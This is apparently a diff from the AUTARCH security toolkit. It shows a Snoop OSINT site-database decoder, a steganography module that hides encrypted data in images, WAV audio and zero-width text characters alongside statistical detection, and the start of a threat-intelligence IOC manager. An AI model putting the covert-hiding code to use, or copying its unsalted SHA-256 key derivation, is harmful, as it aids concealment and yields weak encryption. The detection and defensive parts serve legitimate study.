print(f"{Colors.DIM} Original size: {original_size:,} chars{Colors.RESET}")
# Step 1: Decode base32
print(f"{Colors.CYAN}[*] Decoding base32...{Colors.RESET}")
try:
db_bytes = base64.b32decode(db)
except Exception as e:
print(f"{Colors.RED}[X] Base32 decode failed: {e}{Colors.RESET}")
return None
print(f"{Colors.DIM} After base32: {len(db_bytes):,} bytes{Colors.RESET}")
# Step 2: Reverse bytes
print(f"{Colors.CYAN}[*] Reversing byte order...{Colors.RESET}")
db_bytes = db_bytes[::-1]
# Step 3: Decode UTF-8 with error handling
print(f"{Colors.CYAN}[*] Decoding UTF-8...{Colors.RESET}")
content = db_bytes.decode('utf-8', errors='replace')
# Step 4: Reverse string
print(f"{Colors.CYAN}[*] Reversing string...{Colors.RESET}")
content = content[::-1]
# Step 5: Parse JSON
print(f"{Colors.CYAN}[*] Parsing JSON...{Colors.RESET}")
try:
data = json.loads(content)
except json.JSONDecodeError as e:
print(f"{Colors.RED}[X] JSON parse failed: {e}{Colors.RESET}")
return None
print(f"{Colors.GREEN}[+] Successfully decoded {len(data):,} sites!{Colors.RESET}")
return data
def save_decoded(self, data: dict, output_name: str = "snoop_decoded.json") -> str:
"""Save decoded database to JSON file.
Args:
data: Decoded site dictionary.
output_name: Output filename.
Returns:
Path to saved file.
"""
output_path = self.data_dir / output_name
with open(output_path, 'w', encoding='utf8') as f:
json.dump(data, f, indent=2, ensure_ascii=False)
size_mb = output_path.stat().st_size / 1024 / 1024
print(f"{Colors.GREEN}[+] Saved to: {output_path}{Colors.RESET}")
print(f"{Colors.DIM} File size: {size_mb:.2f} MB{Colors.RESET}")
return str(output_path)
def import_to_database(self, data: dict) -> dict:
"""Import decoded Snoop data into AUTARCH sites database.
Args:
data: Decoded site dictionary.
Returns:
Import statistics.
"""
print(f"\n{Colors.CYAN}[*] Importing to AUTARCH database...{Colors.RESET}")
sites_to_add = []
skipped = 0
for name, entry in data.items():
if not isinstance(entry, dict):
skipped += 1
continue
url = entry.get('url', '')
if not url or '{}' not in url:
skipped += 1
continue
# Get error type - handle encoding issues in key name
error_type = None
for key in entry.keys():
if 'errorTyp' in key or 'errortype' in key.lower():
error_type = entry[key]
break
# Map Snoop error types to detection methods
detection_method = 'status'
if error_type:
if 'message' in str(error_type).lower():
detection_method = 'content'
elif 'redirect' in str(error_type).lower():
detection_method = 'redirect'
# Get error message pattern
error_pattern = None
for key in ['errorMsg', 'errorMsg2']:
if key in entry and entry[key]:
error_pattern = str(entry[key])
break
sites_to_add.append({
'name': name,
'url_template': url,
'url_main': entry.get('urlMain'),
'detection_method': detection_method,
'error_pattern': error_pattern,
'category': 'other',
'nsfw': 0,
})
print(f"{Colors.DIM} Valid sites: {len(sites_to_add):,}{Colors.RESET}")
print(f"{Colors.DIM} Skipped: {skipped:,}{Colors.RESET}")
# Add to database
stats = self.sites_db.add_sites_bulk(sites_to_add)
print(f"{Colors.GREEN}[+] Import complete!{Colors.RESET}")
print(f"{Colors.DIM} Added: {stats['added']:,}{Colors.RESET}")
print(f"{Colors.DIM} Errors: {stats['errors']:,}{Colors.RESET}")
return stats
def show_sample(self, data: dict, count: int = 10):
"""Display sample sites from decoded database.
Args:
data: Decoded site dictionary.
count: Number of samples to show.
"""
print(f"\n{Colors.CYAN}Sample Sites ({count}):{Colors.RESET}")
print("-" * 60)
for i, (name, info) in enumerate(list(data.items())[:count]):
url = info.get('url', 'N/A')
country = info.get('country', '')
print(f" {country} {Colors.GREEN}{name}{Colors.RESET}")
print(f" {Colors.DIM}{url[:55]}...{Colors.RESET}" if len(url) > 55 else f" {Colors.DIM}{url}{Colors.RESET}")
def get_stats(self, data: dict) -> dict:
"""Get statistics about decoded database.
Args:
data: Decoded site dictionary.
Returns:
Statistics dictionary.
"""
stats = {
'total_sites': len(data),
'by_country': {},
'detection_methods': {'status_code': 0, 'message': 0, 'redirection': 0, 'other': 0},
}
for name, info in data.items():
# Country stats
country = info.get('country_klas', 'Unknown')
stats['by_country'][country] = stats['by_country'].get(country, 0) + 1
# Detection method stats
error_type = None
for key in info.keys():
if 'errorTyp' in key:
error_type = str(info[key]).lower()
break
if error_type:
if 'status' in error_type:
stats['detection_methods']['status_code'] += 1
elif 'message' in error_type:
stats['detection_methods']['message'] += 1
elif 'redirect' in error_type:
stats['detection_methods']['redirection'] += 1
else:
stats['detection_methods']['other'] += 1
else:
stats['detection_methods']['other'] += 1
return stats
def display_menu():
"""Display the Snoop Decoder menu."""
print(f"""
{Colors.CYAN} Snoop Database Decoder{Colors.RESET}
{Colors.DIM} Decrypt and import Snoop Project databases{Colors.RESET}
{Colors.DIM}{'' * 50}{Colors.RESET}
{Colors.GREEN}[1]{Colors.RESET} Decode Snoop Database File
{Colors.GREEN}[2]{Colors.RESET} Decode & Import to AUTARCH
{Colors.GREEN}[3]{Colors.RESET} View Current Sites Database Stats
{Colors.GREEN}[4]{Colors.RESET} Quick Import (BDfull from snoop-master)
{Colors.GREEN}[5]{Colors.RESET} Quick Import (BDdemo from snoop-master)
{Colors.RED}[0]{Colors.RESET} Back to OSINT Menu
""")
def get_file_path() -> str:
"""Prompt user for file path."""
print(f"\n{Colors.CYAN}Enter path to Snoop database file:{Colors.RESET}")
print(f"{Colors.DIM}(e.g., /path/to/BDfull or /path/to/BDdemo){Colors.RESET}")
filepath = input(f"\n{Colors.GREEN}Path: {Colors.RESET}").strip()
if not filepath:
return None
if not os.path.exists(filepath):
print(f"{Colors.RED}[X] File not found: {filepath}{Colors.RESET}")
return None
return filepath
def run():
"""Main entry point for the module."""
decoder = SnoopDecoder()
# Common paths for Snoop databases
from core.paths import get_app_dir, get_data_dir
_app = get_app_dir()
_data = get_data_dir()
snoop_paths = {
'bdfull': _app / "snoop" / "snoop-master" / "BDfull",
'bddemo': _app / "snoop" / "snoop-master" / "BDdemo",
'bdfull_alt': _data / "snoop" / "BDfull",
'bddemo_alt': _data / "snoop" / "BDdemo",
}
while True:
display_menu()
choice = input(f"{Colors.GREEN}Select option: {Colors.RESET}").strip()
if choice == '0':
break
elif choice == '1':
# Decode only
filepath = get_file_path()
if not filepath:
continue
data = decoder.decode_database(filepath)
if data:
decoder.show_sample(data)
stats = decoder.get_stats(data)
print(f"\n{Colors.CYAN}Database Statistics:{Colors.RESET}")
print(f" Total sites: {stats['total_sites']:,}")
print(f" Detection methods: {stats['detection_methods']}")
print(f" Top countries: {dict(sorted(stats['by_country'].items(), key=lambda x: -x[1])[:10])}")
# Ask to save
save = input(f"\n{Colors.YELLOW}Save decoded JSON? (y/n): {Colors.RESET}").strip().lower()
if save == 'y':
name = input(f"{Colors.GREEN}Output filename [snoop_decoded.json]: {Colors.RESET}").strip()
decoder.save_decoded(data, name if name else "snoop_decoded.json")
elif choice == '2':
# Decode and import
filepath = get_file_path()
if not filepath:
continue
data = decoder.decode_database(filepath)
if data:
decoder.show_sample(data, 5)
confirm = input(f"\n{Colors.YELLOW}Import {len(data):,} sites to AUTARCH? (y/n): {Colors.RESET}").strip().lower()
if confirm == 'y':
# Save first
decoder.save_decoded(data, "snoop_imported.json")
# Then import
decoder.import_to_database(data)
# Show final stats
db_stats = decoder.sites_db.get_stats()
print(f"\n{Colors.GREEN}AUTARCH Database now has {db_stats['total_sites']:,} sites!{Colors.RESET}")
elif choice == '3':
# View current stats
stats = decoder.sites_db.get_stats()
print(f"\n{Colors.CYAN}AUTARCH Sites Database:{Colors.RESET}")
print(f" Total sites: {stats['total_sites']:,}")
print(f" NSFW sites: {stats['nsfw_sites']:,}")
print(f" Database size: {stats['db_size_mb']:.2f} MB")
print(f"\n {Colors.CYAN}By Source:{Colors.RESET}")
for source, count in sorted(stats['by_source'].items(), key=lambda x: -x[1]):
print(f" {source}: {count:,}")
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
elif choice == '4':
# Quick import BDfull
bdpath = None
for key in ['bdfull', 'bdfull_alt']:
if snoop_paths[key].exists():
bdpath = str(snoop_paths[key])
break
if not bdpath:
print(f"{Colors.RED}[X] BDfull not found in known locations{Colors.RESET}")
print(f"{Colors.DIM} Checked: {snoop_paths['bdfull']}{Colors.RESET}")
print(f"{Colors.DIM} Checked: {snoop_paths['bdfull_alt']}{Colors.RESET}")
continue
print(f"{Colors.GREEN}[+] Found BDfull: {bdpath}{Colors.RESET}")
data = decoder.decode_database(bdpath)
if data:
confirm = input(f"\n{Colors.YELLOW}Import {len(data):,} sites? (y/n): {Colors.RESET}").strip().lower()
if confirm == 'y':
decoder.save_decoded(data, "snoop_full.json")
decoder.import_to_database(data)
db_stats = decoder.sites_db.get_stats()
print(f"\n{Colors.GREEN}AUTARCH Database now has {db_stats['total_sites']:,} sites!{Colors.RESET}")
elif choice == '5':
# Quick import BDdemo
bdpath = None
for key in ['bddemo', 'bddemo_alt']:
if snoop_paths[key].exists():
bdpath = str(snoop_paths[key])
break
if not bdpath:
print(f"{Colors.RED}[X] BDdemo not found in known locations{Colors.RESET}")
continue
print(f"{Colors.GREEN}[+] Found BDdemo: {bdpath}{Colors.RESET}")
data = decoder.decode_database(bdpath)
if data:
confirm = input(f"\n{Colors.YELLOW}Import {len(data):,} sites? (y/n): {Colors.RESET}").strip().lower()
if confirm == 'y':
decoder.save_decoded(data, "snoop_demo.json")
decoder.import_to_database(data)
db_stats = decoder.sites_db.get_stats()
print(f"\n{Colors.GREEN}AUTARCH Database now has {db_stats['total_sites']:,} sites!{Colors.RESET}")
else:
print(f"{Colors.RED}[!] Invalid option{Colors.RESET}")
if __name__ == "__main__":
run()

1305
modules/social_eng.py Normal file

File diff suppressed because it is too large Load Diff

2349
modules/starlink_hack.py Normal file

File diff suppressed because it is too large Load Diff

769
modules/steganography.py Normal file
View File

@@ -0,0 +1,769 @@
"""AUTARCH Steganography
Image/audio/document steganography — hide data in carrier files using LSB
encoding, DCT domain embedding, and whitespace encoding. Includes detection
via statistical analysis and optional AES-256 encryption.
"""
DESCRIPTION = "Steganography — hide & extract data in files"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "counter"
import os
import io
import re
import json
import struct
import hashlib
import secrets
from pathlib import Path
from typing import Dict, List, Optional, Tuple
try:
from core.paths import get_data_dir
except ImportError:
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
# Optional imports
try:
from PIL import Image
HAS_PIL = True
except ImportError:
HAS_PIL = False
try:
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
HAS_CRYPTO = True
except ImportError:
try:
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import pad, unpad
HAS_CRYPTO = True
except ImportError:
HAS_CRYPTO = False
try:
import wave
HAS_WAVE = True
except ImportError:
HAS_WAVE = False
# ── Encryption Layer ─────────────────────────────────────────────────────────
def _derive_key(password: str) -> bytes:
"""Derive 256-bit key from password."""
return hashlib.sha256(password.encode()).digest()
def _encrypt_data(data: bytes, password: str) -> bytes:
"""AES-256-CBC encrypt data."""
if not HAS_CRYPTO:
return data
key = _derive_key(password)
iv = secrets.token_bytes(16)
cipher = AES.new(key, AES.MODE_CBC, iv)
ct = cipher.encrypt(pad(data, AES.block_size))
return iv + ct
def _decrypt_data(data: bytes, password: str) -> bytes:
"""AES-256-CBC decrypt data."""
if not HAS_CRYPTO:
return data
key = _derive_key(password)
iv = data[:16]
ct = data[16:]
cipher = AES.new(key, AES.MODE_CBC, iv)
return unpad(cipher.decrypt(ct), AES.block_size)
# ── LSB Image Steganography ──────────────────────────────────────────────────
class ImageStego:
"""LSB steganography for PNG/BMP images."""
MAGIC = b'ASTS' # AUTARCH Stego Signature
@staticmethod
def capacity(image_path: str) -> Dict:
"""Calculate maximum payload capacity in bytes."""
if not HAS_PIL:
return {'ok': False, 'error': 'Pillow (PIL) not installed'}
try:
img = Image.open(image_path)
w, h = img.size
channels = len(img.getbands())
# 1 bit per channel per pixel, minus header
total_bits = w * h * channels
total_bytes = total_bits // 8 - 8 # subtract header (magic + length)
return {
'ok': True, 'capacity_bytes': max(0, total_bytes),
'width': w, 'height': h, 'channels': channels,
'format': img.format
}
except Exception as e:
return {'ok': False, 'error': str(e)}
@staticmethod
def hide(image_path: str, data: bytes, output_path: str,
password: str = None, bits_per_channel: int = 1) -> Dict:
"""Hide data in image using LSB encoding."""
if not HAS_PIL:
return {'ok': False, 'error': 'Pillow (PIL) not installed'}
try:
img = Image.open(image_path).convert('RGB')
pixels = list(img.getdata())
w, h = img.size
# Encrypt if password provided
payload = data
if password:
payload = _encrypt_data(data, password)
# Build header: magic(4) + length(4) + payload
header = ImageStego.MAGIC + struct.pack('>I', len(payload))
full_data = header + payload
# Convert to bits
bits = []
for byte in full_data:
for i in range(7, -1, -1):
bits.append((byte >> i) & 1)
# Check capacity
max_bits = len(pixels) * 3 * bits_per_channel
if len(bits) > max_bits:
return {'ok': False, 'error': f'Data too large ({len(full_data)} bytes). '
f'Max capacity: {max_bits // 8} bytes'}
# Encode bits into LSB
bit_idx = 0
new_pixels = []
mask = ~((1 << bits_per_channel) - 1) & 0xFF
for pixel in pixels:
new_pixel = []
for channel_val in pixel:
if bit_idx < len(bits):
# Clear LSBs and set new value
new_val = (channel_val & mask) | bits[bit_idx]
new_pixel.append(new_val)
bit_idx += 1
else:
new_pixel.append(channel_val)
new_pixels.append(tuple(new_pixel))
# Save
stego_img = Image.new('RGB', (w, h))
stego_img.putdata(new_pixels)
stego_img.save(output_path, 'PNG')
return {
'ok': True,
'output': output_path,
'hidden_bytes': len(payload),
'encrypted': password is not None,
'message': f'Hidden {len(payload)} bytes in {output_path}'
}
except Exception as e:
return {'ok': False, 'error': str(e)}
@staticmethod
def extract(image_path: str, password: str = None,
bits_per_channel: int = 1) -> Dict:
"""Extract hidden data from image."""
if not HAS_PIL:
return {'ok': False, 'error': 'Pillow (PIL) not installed'}
try:
img = Image.open(image_path).convert('RGB')
pixels = list(img.getdata())
# Extract all LSBs
bits = []
for pixel in pixels:
for channel_val in pixel:
bits.append(channel_val & 1)
# Convert bits to bytes
all_bytes = bytearray()
for i in range(0, len(bits) - 7, 8):
byte = 0
for j in range(8):
byte = (byte << 1) | bits[i + j]
all_bytes.append(byte)
# Check magic
if all_bytes[:4] != ImageStego.MAGIC:
return {'ok': False, 'error': 'No hidden data found (magic mismatch)'}
# Read length
payload_len = struct.unpack('>I', bytes(all_bytes[4:8]))[0]
if payload_len > len(all_bytes) - 8:
return {'ok': False, 'error': 'Corrupted data (length exceeds image capacity)'}
payload = bytes(all_bytes[8:8 + payload_len])
# Decrypt if password provided
if password:
try:
payload = _decrypt_data(payload, password)
except Exception:
return {'ok': False, 'error': 'Decryption failed (wrong password?)'}
return {
'ok': True,
'data': payload,
'size': len(payload),
'encrypted': password is not None,
'message': f'Extracted {len(payload)} bytes'
}
except Exception as e:
return {'ok': False, 'error': str(e)}
# ── Audio Steganography ──────────────────────────────────────────────────────
class AudioStego:
"""LSB steganography for WAV audio files."""
MAGIC = b'ASTS'
@staticmethod
def capacity(audio_path: str) -> Dict:
"""Calculate maximum payload capacity."""
if not HAS_WAVE:
return {'ok': False, 'error': 'wave module not available'}
try:
with wave.open(audio_path, 'rb') as w:
frames = w.getnframes()
channels = w.getnchannels()
sample_width = w.getsampwidth()
total_bytes = (frames * channels) // 8 - 8
return {
'ok': True, 'capacity_bytes': max(0, total_bytes),
'frames': frames, 'channels': channels,
'sample_width': sample_width,
'framerate': w.getframerate()
}
except Exception as e:
return {'ok': False, 'error': str(e)}
@staticmethod
def hide(audio_path: str, data: bytes, output_path: str,
password: str = None) -> Dict:
"""Hide data in WAV audio using LSB of samples."""
if not HAS_WAVE:
return {'ok': False, 'error': 'wave module not available'}
try:
with wave.open(audio_path, 'rb') as w:
params = w.getparams()
frames = w.readframes(w.getnframes())
payload = data
if password:
payload = _encrypt_data(data, password)
header = AudioStego.MAGIC + struct.pack('>I', len(payload))
full_data = header + payload
bits = []
for byte in full_data:
for i in range(7, -1, -1):
bits.append((byte >> i) & 1)
samples = list(frames)
if len(bits) > len(samples):
return {'ok': False, 'error': f'Data too large. Max: {len(samples) // 8} bytes'}
for i, bit in enumerate(bits):
samples[i] = (samples[i] & 0xFE) | bit
with wave.open(output_path, 'wb') as w:
w.setparams(params)
w.writeframes(bytes(samples))
return {
'ok': True, 'output': output_path,
'hidden_bytes': len(payload),
'encrypted': password is not None
}
except Exception as e:
return {'ok': False, 'error': str(e)}
@staticmethod
def extract(audio_path: str, password: str = None) -> Dict:
"""Extract hidden data from WAV audio."""
if not HAS_WAVE:
return {'ok': False, 'error': 'wave module not available'}
try:
with wave.open(audio_path, 'rb') as w:
frames = w.readframes(w.getnframes())
samples = list(frames)
bits = [s & 1 for s in samples]
all_bytes = bytearray()
for i in range(0, len(bits) - 7, 8):
byte = 0
for j in range(8):
byte = (byte << 1) | bits[i + j]
all_bytes.append(byte)
if all_bytes[:4] != AudioStego.MAGIC:
return {'ok': False, 'error': 'No hidden data found'}
payload_len = struct.unpack('>I', bytes(all_bytes[4:8]))[0]
payload = bytes(all_bytes[8:8 + payload_len])
if password:
try:
payload = _decrypt_data(payload, password)
except Exception:
return {'ok': False, 'error': 'Decryption failed'}
return {'ok': True, 'data': payload, 'size': len(payload)}
except Exception as e:
return {'ok': False, 'error': str(e)}
# ── Document Steganography ───────────────────────────────────────────────────
class DocumentStego:
"""Whitespace and metadata steganography for text/documents."""
@staticmethod
def hide_whitespace(text: str, data: bytes, password: str = None) -> Dict:
"""Hide data using zero-width characters in text."""
payload = data
if password:
payload = _encrypt_data(data, password)
# Zero-width characters
ZWS = '\u200b' # zero-width space → 0
ZWNJ = '\u200c' # zero-width non-joiner → 1
ZWJ = '\u200d' # zero-width joiner → separator
# Convert payload to binary string
bits = ''.join(f'{byte:08b}' for byte in payload)
encoded = ''
for bit in bits:
encoded += ZWNJ if bit == '1' else ZWS
# Insert length prefix
length_bits = f'{len(payload):032b}'
length_encoded = ''
for bit in length_bits:
length_encoded += ZWNJ if bit == '1' else ZWS
hidden = length_encoded + ZWJ + encoded
# Insert after first line
lines = text.split('\n', 1)
if len(lines) > 1:
result = lines[0] + hidden + '\n' + lines[1]
else:
result = text + hidden
return {
'ok': True, 'text': result,
'hidden_bytes': len(payload),
'encrypted': password is not None
}
@staticmethod
def extract_whitespace(text: str, password: str = None) -> Dict:
"""Extract data hidden in zero-width characters."""
ZWS = '\u200b'
ZWNJ = '\u200c'
ZWJ = '\u200d'
# Find zero-width characters
zw_chars = ''.join(c for c in text if c in (ZWS, ZWNJ, ZWJ))
if ZWJ not in zw_chars:
return {'ok': False, 'error': 'No hidden data found'}
length_part, data_part = zw_chars.split(ZWJ, 1)
# Decode length
length_bits = ''.join('1' if c == ZWNJ else '0' for c in length_part)
if len(length_bits) < 32:
return {'ok': False, 'error': 'Corrupted header'}
payload_len = int(length_bits[:32], 2)
# Decode data
data_bits = ''.join('1' if c == ZWNJ else '0' for c in data_part)
payload = bytearray()
for i in range(0, min(len(data_bits), payload_len * 8), 8):
if i + 8 <= len(data_bits):
payload.append(int(data_bits[i:i+8], 2))
result_data = bytes(payload)
if password:
try:
result_data = _decrypt_data(result_data, password)
except Exception:
return {'ok': False, 'error': 'Decryption failed'}
return {'ok': True, 'data': result_data, 'size': len(result_data)}
# ── Detection / Analysis ────────────────────────────────────────────────────
class StegoDetector:
"""Statistical analysis to detect hidden data in files."""
@staticmethod
def analyze_image(image_path: str) -> Dict:
"""Analyze image for signs of steganography."""
if not HAS_PIL:
return {'ok': False, 'error': 'Pillow (PIL) not installed'}
try:
img = Image.open(image_path).convert('RGB')
pixels = list(img.getdata())
w, h = img.size
# Chi-square analysis on LSBs
observed = [0, 0] # count of 0s and 1s in R channel LSBs
for pixel in pixels:
observed[pixel[0] & 1] += 1
total = sum(observed)
expected = total / 2
chi_sq = sum((o - expected) ** 2 / expected for o in observed)
# RS analysis (Regular-Singular groups)
# Count pixel pairs where LSB flip changes smoothness
regular = 0
singular = 0
for i in range(0, len(pixels) - 1, 2):
p1, p2 = pixels[i][0], pixels[i+1][0]
diff_orig = abs(p1 - p2)
diff_flip = abs((p1 ^ 1) - p2)
if diff_flip > diff_orig:
regular += 1
elif diff_flip < diff_orig:
singular += 1
total_pairs = regular + singular
rs_ratio = regular / total_pairs if total_pairs > 0 else 0.5
# Check for ASTS magic in LSBs
bits = []
for pixel in pixels[:100]:
for c in pixel:
bits.append(c & 1)
header_bytes = bytearray()
for i in range(0, min(32, len(bits)), 8):
byte = 0
for j in range(8):
byte = (byte << 1) | bits[i + j]
header_bytes.append(byte)
has_asts_magic = header_bytes[:4] == ImageStego.MAGIC
# Scoring
score = 0
indicators = []
if chi_sq < 1.0:
score += 30
indicators.append(f'LSB distribution very uniform (chi²={chi_sq:.2f})')
elif chi_sq < 3.84:
score += 15
indicators.append(f'LSB distribution slightly uniform (chi²={chi_sq:.2f})')
if rs_ratio > 0.6:
score += 25
indicators.append(f'RS analysis suggests embedding (R/S={rs_ratio:.3f})')
if has_asts_magic:
score += 50
indicators.append('AUTARCH stego signature detected in LSB')
# Check file size vs expected
file_size = os.path.getsize(image_path)
expected_size = w * h * 3 # rough uncompressed estimate
if file_size > expected_size * 0.9: # PNG should be smaller
score += 10
indicators.append('File larger than expected for format')
verdict = 'clean'
if score >= 50:
verdict = 'likely_stego'
elif score >= 25:
verdict = 'suspicious'
return {
'ok': True,
'verdict': verdict,
'confidence_score': min(100, score),
'chi_square': round(chi_sq, 4),
'rs_ratio': round(rs_ratio, 4),
'has_magic': has_asts_magic,
'indicators': indicators,
'image_info': {'width': w, 'height': h, 'size': file_size}
}
except Exception as e:
return {'ok': False, 'error': str(e)}
@staticmethod
def analyze_audio(audio_path: str) -> Dict:
"""Analyze audio file for signs of steganography."""
if not HAS_WAVE:
return {'ok': False, 'error': 'wave module not available'}
try:
with wave.open(audio_path, 'rb') as w:
frames = w.readframes(min(w.getnframes(), 100000))
params = w.getparams()
samples = list(frames)
observed = [0, 0]
for s in samples:
observed[s & 1] += 1
total = sum(observed)
expected = total / 2
chi_sq = sum((o - expected) ** 2 / expected for o in observed)
# Check for magic
bits = [s & 1 for s in samples[:100]]
header_bytes = bytearray()
for i in range(0, min(32, len(bits)), 8):
byte = 0
for j in range(8):
byte = (byte << 1) | bits[i + j]
header_bytes.append(byte)
has_magic = header_bytes[:4] == AudioStego.MAGIC
score = 0
indicators = []
if chi_sq < 1.0:
score += 30
indicators.append(f'LSB distribution uniform (chi²={chi_sq:.2f})')
if has_magic:
score += 50
indicators.append('AUTARCH stego signature detected')
verdict = 'clean'
if score >= 50:
verdict = 'likely_stego'
elif score >= 25:
verdict = 'suspicious'
return {
'ok': True, 'verdict': verdict,
'confidence_score': min(100, score),
'chi_square': round(chi_sq, 4),
'has_magic': has_magic,
'indicators': indicators,
'audio_info': {
'channels': params.nchannels,
'framerate': params.framerate,
'frames': params.nframes
}
}
except Exception as e:
return {'ok': False, 'error': str(e)}
# ── Steganography Manager ───────────────────────────────────────────────────
class StegoManager:
"""Unified interface for all steganography operations."""
def __init__(self):
self.data_dir = os.path.join(get_data_dir(), 'stego')
os.makedirs(self.data_dir, exist_ok=True)
self.image = ImageStego()
self.audio = AudioStego()
self.document = DocumentStego()
self.detector = StegoDetector()
def get_capabilities(self) -> Dict:
"""Check available steganography capabilities."""
return {
'image': HAS_PIL,
'audio': HAS_WAVE,
'document': True,
'encryption': HAS_CRYPTO,
'detection': HAS_PIL or HAS_WAVE
}
def hide(self, carrier_path: str, data: bytes, output_path: str = None,
password: str = None, carrier_type: str = None) -> Dict:
"""Hide data in a carrier file (auto-detect type)."""
if not carrier_type:
ext = Path(carrier_path).suffix.lower()
if ext in ('.png', '.bmp', '.tiff', '.tif'):
carrier_type = 'image'
elif ext in ('.wav', '.wave'):
carrier_type = 'audio'
else:
return {'ok': False, 'error': f'Unsupported carrier format: {ext}'}
if not output_path:
p = Path(carrier_path)
output_path = str(p.parent / f'{p.stem}_stego{p.suffix}')
if carrier_type == 'image':
return self.image.hide(carrier_path, data, output_path, password)
elif carrier_type == 'audio':
return self.audio.hide(carrier_path, data, output_path, password)
return {'ok': False, 'error': f'Unsupported type: {carrier_type}'}
def extract(self, carrier_path: str, password: str = None,
carrier_type: str = None) -> Dict:
"""Extract hidden data from carrier file."""
if not carrier_type:
ext = Path(carrier_path).suffix.lower()
if ext in ('.png', '.bmp', '.tiff', '.tif'):
carrier_type = 'image'
elif ext in ('.wav', '.wave'):
carrier_type = 'audio'
if carrier_type == 'image':
return self.image.extract(carrier_path, password)
elif carrier_type == 'audio':
return self.audio.extract(carrier_path, password)
return {'ok': False, 'error': f'Unsupported type: {carrier_type}'}
def detect(self, file_path: str) -> Dict:
"""Analyze file for steganographic content."""
ext = Path(file_path).suffix.lower()
if ext in ('.png', '.bmp', '.tiff', '.tif', '.jpg', '.jpeg'):
return self.detector.analyze_image(file_path)
elif ext in ('.wav', '.wave'):
return self.detector.analyze_audio(file_path)
return {'ok': False, 'error': f'Unsupported format for detection: {ext}'}
def capacity(self, file_path: str) -> Dict:
"""Check capacity of a carrier file."""
ext = Path(file_path).suffix.lower()
if ext in ('.png', '.bmp', '.tiff', '.tif'):
return self.image.capacity(file_path)
elif ext in ('.wav', '.wave'):
return self.audio.capacity(file_path)
return {'ok': False, 'error': f'Unsupported format: {ext}'}
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None
def get_stego_manager() -> StegoManager:
global _instance
if _instance is None:
_instance = StegoManager()
return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
"""CLI entry point for Steganography module."""
mgr = get_stego_manager()
while True:
caps = mgr.get_capabilities()
print(f"\n{'='*60}")
print(f" Steganography")
print(f"{'='*60}")
print(f" Image: {'OK' if caps['image'] else 'MISSING (pip install Pillow)'}")
print(f" Audio: {'OK' if caps['audio'] else 'MISSING'}")
print(f" Encryption: {'OK' if caps['encryption'] else 'MISSING (pip install pycryptodome)'}")
print()
print(" 1 — Hide Data in File")
print(" 2 — Extract Data from File")
print(" 3 — Detect Steganography")
print(" 4 — Check Carrier Capacity")
print(" 5 — Hide Text in Document (whitespace)")
print(" 6 — Extract Text from Document")
print(" 0 — Back")
print()
choice = input(" > ").strip()
if choice == '0':
break
elif choice == '1':
carrier = input(" Carrier file path: ").strip()
message = input(" Message to hide: ").strip()
output = input(" Output file path (blank=auto): ").strip() or None
password = input(" Encryption password (blank=none): ").strip() or None
if carrier and message:
result = mgr.hide(carrier, message.encode(), output, password)
if result['ok']:
print(f" Success: {result.get('message', result.get('output'))}")
else:
print(f" Error: {result['error']}")
elif choice == '2':
carrier = input(" Stego file path: ").strip()
password = input(" Password (blank=none): ").strip() or None
if carrier:
result = mgr.extract(carrier, password)
if result['ok']:
try:
text = result['data'].decode('utf-8')
print(f" Extracted ({result['size']} bytes): {text}")
except UnicodeDecodeError:
print(f" Extracted {result['size']} bytes (binary data)")
else:
print(f" Error: {result['error']}")
elif choice == '3':
filepath = input(" File to analyze: ").strip()
if filepath:
result = mgr.detect(filepath)
if result['ok']:
print(f" Verdict: {result['verdict']} (score: {result['confidence_score']})")
for ind in result.get('indicators', []):
print(f" - {ind}")
else:
print(f" Error: {result['error']}")
elif choice == '4':
filepath = input(" Carrier file: ").strip()
if filepath:
result = mgr.capacity(filepath)
if result['ok']:
kb = result['capacity_bytes'] / 1024
print(f" Capacity: {result['capacity_bytes']} bytes ({kb:.1f} KB)")
else:
print(f" Error: {result['error']}")
elif choice == '5':
text = input(" Cover text: ").strip()
message = input(" Hidden message: ").strip()
password = input(" Password (blank=none): ").strip() or None
if text and message:
result = mgr.document.hide_whitespace(text, message.encode(), password)
if result['ok']:
print(f" Output text (copy this):")
print(f" {result['text']}")
else:
print(f" Error: {result['error']}")
elif choice == '6':
text = input(" Text with hidden data: ").strip()
password = input(" Password (blank=none): ").strip() or None
if text:
result = mgr.document.extract_whitespace(text, password)
if result['ok']:
print(f" Hidden message: {result['data'].decode('utf-8', errors='replace')}")
else:
print(f" Error: {result['error']}")

716
modules/threat_intel.py Normal file
View File

@@ -0,0 +1,716 @@
"""AUTARCH Threat Intelligence Feed
IOC management, feed ingestion (STIX/TAXII, CSV, JSON), correlation with
OSINT dossiers, reputation lookups, alerting, and blocklist generation.
"""
DESCRIPTION = "Threat intelligence & IOC management"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "defense"
import os
import re
import json
import time
import hashlib
import threading
from pathlib import Path
from datetime import datetime, timezone
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any, Set
from urllib.parse import urlparse
try:
from core.paths import get_data_dir
except ImportError:
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
try:
import requests
except ImportError:
requests = None
# ── Data Structures ──────────────────────────────────────────────────────────
IOC_TYPES = ['ip', 'domain', 'url', 'hash_md5', 'hash_sha1', 'hash_sha256', 'email', 'filename']
@dataclass
class IOC:
value: str
ioc_type: str
source: str = "manual"
tags: List[str] = field(default_factory=list)
severity: str = "unknown" # critical, high, medium, low, info, unknown
first_seen: str = ""
last_seen: str = ""
description: str = ""
reference: str = ""
active: bool = True
def to_dict(self) -> Dict:
return {
'value': self.value, 'ioc_type': self.ioc_type,
'source': self.source, 'tags': self.tags,
'severity': self.severity, 'first_seen': self.first_seen,
'last_seen': self.last_seen, 'description': self.description,
'reference': self.reference, 'active': self.active,
'id': hashlib.md5(f"{self.ioc_type}:{self.value}".encode()).hexdigest()[:12]
}
@staticmethod
def from_dict(d: Dict) -> 'IOC':
return IOC(
value=d['value'], ioc_type=d['ioc_type'],
source=d.get('source', 'manual'), tags=d.get('tags', []),
severity=d.get('severity', 'unknown'),
first_seen=d.get('first_seen', ''), last_seen=d.get('last_seen', ''),
description=d.get('description', ''), reference=d.get('reference', ''),
active=d.get('active', True)
)
@dataclass
class Feed:
